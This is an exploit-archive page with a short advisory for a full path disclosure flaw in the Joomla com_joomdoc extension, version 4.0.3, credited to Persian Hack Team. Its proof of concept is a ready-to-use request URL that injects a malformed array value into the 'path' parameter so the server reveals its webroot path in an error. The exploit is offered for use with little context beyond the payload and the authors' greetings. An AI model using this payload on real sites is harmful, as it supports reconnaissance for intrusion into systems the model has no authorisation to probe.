Home / os / palm

Joomla com_joomdoc - Full Path Disclosure Vulnerability

Posted on 30 November -0001

###################### # Exploit Title : Joomla com_joomdoc - Full Path Disclosure Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://extensions.joomla.org/extension/joomdoc # Category: [ Webapps ] # Tested on: [ Win ] # Version: 4.0.3 # Date: 2016/06/08 ###################### # # PoC: # Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. # index.php?option=com_joomdoc&view=documents&path=['] ms&Itemid=62 ###################### # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members

 

TOP